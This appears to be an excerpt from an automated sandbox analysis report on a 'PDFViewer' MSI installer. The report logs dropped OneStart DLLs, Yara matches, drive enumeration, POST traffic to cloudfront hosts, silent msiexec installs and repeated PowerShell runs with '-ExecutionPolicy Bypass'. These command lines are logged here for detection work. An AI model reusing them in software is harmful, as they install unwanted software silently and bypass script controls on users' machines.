          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Runtime.Serialization.Formatters.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Text.Json.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.WebSockets.Client.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Security.Cryptography.Encoding.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.Pipes.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Diagnostics.Debug.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\Unity.Abstractions.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.Requests.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.ComponentModel.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.Primitives.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Xml.XmlSerializer.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Resources.Reader.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Linq.Queryable.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Threading.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Threading.Thread.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Buffers.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Runtime.CompilerServices.VisualC.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Diagnostics.Tools.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Threading.Tasks.Extensions.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\Microsoft.Win32.Primitives.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Runtime.Handles.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.Security.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Diagnostics.Contracts.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Xml.XPath.XDocument.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\DBarCore.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Runtime.InteropServices.RuntimeInformation.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Collections.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.Sockets.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Runtime.Serialization.Xml.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Security.Cryptography.Algorithms.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Threading.Tasks.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Numerics.Vectors.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.NetworkInformation.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\msvcp140_1.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Dynamic.Runtime.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Diagnostics.FileVersionInfo.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.FileSystem.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.WebHeaderCollection.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Xml.XPath.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Diagnostics.StackTrace.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Globalization.Calendars.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Data.Common.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Runtime.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Security.Claims.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Globalization.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Security.SecureString.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Diagnostics.TraceSource.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Security.Cryptography.Primitives.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Text.RegularExpressions.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\HtmlAgilityPack.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Linq.Expressions.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Reflection.Extensions.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\msvcp140_codecvt_ids.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.FileSystem.DriveInfo.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\vcruntime140.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Security.Cryptography.Csp.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.Compression.ZipFile.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Xml.ReaderWriter.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.AppContext.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\Microsoft.WindowsAPICodePack.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Diagnostics.Tracing.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.Compression.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.Http.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Memory.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Threading.Overlapped.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\vccorlib140.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.WebSockets.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.UnmanagedMemoryStream.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Resources.Writer.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Linq.Parallel.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Resources.ResourceManager.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\msvcp140_atomic_wait.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Collections.Concurrent.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Text.Encodings.Web.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\Microsoft.Xaml.Behaviors.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.ComponentModel.Primitives.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Drawing.Primitives.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.FileSystem.Primitives.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.ObjectModel.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\FluentWPF.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Threading.ThreadPool.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\msvcp140.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\Flurl.Http.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.Ping.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\websocket-sharp.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Runtime.Numerics.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\Flurl.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Xml.XDocument.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Runtime.InteropServices.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\Microsoft.Bcl.AsyncInterfaces.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Text.Encoding.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.IsolatedStorage.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.ValueTuple.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\concrt140.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Threading.Timer.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.ComponentModel.EventBasedAsync.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Runtime.Serialization.Primitives.dll
          Source: unknownHTTPS traffic detected: 18.165.201.17:443 -> 192.168.2.3:49756 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 143.204.9.38:443 -> 192.168.2.3:49764 version: TLS 1.2
          Source: PDFViewer_44882564 (1).msiStatic PE information: certificate valid
          Source: C:\Windows\System32\msiexec.exeFile opened: z:
          Source: C:\Windows\System32\msiexec.exeFile opened: x:
          Source: C:\Windows\System32\msiexec.exeFile opened: v:
          Source: C:\Windows\System32\msiexec.exeFile opened: t:
          Source: C:\Windows\System32\msiexec.exeFile opened: r:
          Source: C:\Windows\System32\msiexec.exeFile opened: p:
          Source: C:\Windows\System32\msiexec.exeFile opened: n:
          Source: C:\Windows\System32\msiexec.exeFile opened: l:
          Source: C:\Windows\System32\msiexec.exeFile opened: j:
          Source: C:\Windows\System32\msiexec.exeFile opened: h:
          Source: C:\Windows\System32\msiexec.exeFile opened: f:
          Source: C:\Windows\System32\msiexec.exeFile opened: b:
          Source: C:\Windows\System32\msiexec.exeFile opened: y:
          Source: C:\Windows\System32\msiexec.exeFile opened: w:
          Source: C:\Windows\System32\msiexec.exeFile opened: u:
          Source: C:\Windows\System32\msiexec.exeFile opened: s:
          Source: C:\Windows\System32\msiexec.exeFile opened: q:
          Source: C:\Windows\System32\msiexec.exeFile opened: o:
          Source: C:\Windows\System32\msiexec.exeFile opened: m:
          Source: C:\Windows\System32\msiexec.exeFile opened: k:
          Source: C:\Windows\System32\msiexec.exeFile opened: i:
          Source: C:\Windows\System32\msiexec.exeFile opened: g:
          Source: C:\Windows\System32\msiexec.exeFile opened: e:
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: c:
          Source: C:\Windows\System32\msiexec.exeFile opened: a:

          Networking

          barindex
          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\OneStart\bar\netstandard.dll, type: DROPPED
          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\OneStart\bar\DBar.exe, type: DROPPED
          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\OneStart\bar\netstandard.dll, type: DROPPED
          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\OneStart\bar\DBar.exe, type: DROPPED
          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: dpseqd9pkrc26.cloudfront.netContent-Length: 183Expect: 100-continueConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: d1xdao0g1hqd47.cloudfront.netContent-Length: 112Expect: 100-continueConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: dpseqd9pkrc26.cloudfront.netContent-Length: 183Expect: 100-continueConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: d1xdao0g1hqd47.cloudfront.netContent-Length: 115Expect: 100-continueConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: dhb63vq2dmigo.cloudfront.netContent-Length: 140Expect: 100-continueConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: dhb63vq2dmigo.cloudfront.netContent-Length: 176Expect: 100-continue
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
          Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownHTTP traffic detected: POST / HTTP/1.1Host: dpseqd9pkrc26.cloudfront.netContent-Length: 183Expect: 100-continueConnection: Keep-Alive
          Source: unknownDNS traffic detected: queries for: dpseqd9pkrc26.cloudfront.net
          Source: unknownHTTPS traffic detected: 18.165.201.17:443 -> 192.168.2.3:49756 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 143.204.9.38:443 -> 192.168.2.3:49764 version: TLS 1.2
          Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSI6798.tmp
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\656517.msi
          Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dll
          Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dll
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
          Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dll
          Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dll
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
          Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dll
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: tsappcmp.dll
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: tsappcmp.dll
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
          Source: C:\Windows\System32\msiexec.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
          Source: unknownProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\PDFViewer_44882564 (1).msi"
          Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
          Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 5ADB98630CC4B226B2004FF6626A3D5C C
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss9362.tmp.ps1"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssA3D1.tmp.ps1"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssB4FB.tmp.ps1"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssC80A.tmp.ps1"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssE3B5.tmp.ps1"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\PDFViewer_44882564 (1).msi"
          Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 89BFE6A67EA52C9D6229530A7603552C C
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss14E.tmp.ps1"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss338E.tmp.ps1"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss9362.tmp.ps1"
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss5F45.tmp.ps1"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\OneStart.ai\OneStart Software\prerequisites\OneStartBarSetup.msi" /qn
          Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 7B048B739A129C4760975253DFD4D71B
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss68A3.tmp.ps1"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss9D9A.tmp.ps1"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssC2FC.tmp.ps1"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssDFC8.tmp.ps1"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 89BFE6A67EA52C9D6229530A7603552C C
          Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 7B048B739A129C4760975253DFD4D71B
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss14E.tmp.ps1"
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss338E.tmp.ps1"
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss5F45.tmp.ps1"
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss68A3.tmp.ps1"
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\OneStart.ai\OneStart Software\prerequisites\WCSetup_OstWC.msi" /q
          Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 0149F3E23FD7725D047AE755BC5E69BF
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss129F.tmp.ps1"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss7063.tmp.ps1"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 0149F3E23FD7725D047AE755BC5E69BF
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssE3B5.tmp.ps1"
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\OneStart.ai\OneStart Software\prerequisites\OneStartBarSetup.msi" /qn
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\OneStart.ai\OneStart Software\prerequisites\WCSetup_OstWC.msi" /q
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss9D9A.tmp.ps1"
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssDFC8.tmp.ps1"
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssC2FC.tmp.ps1"
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss129F.tmp.ps1"
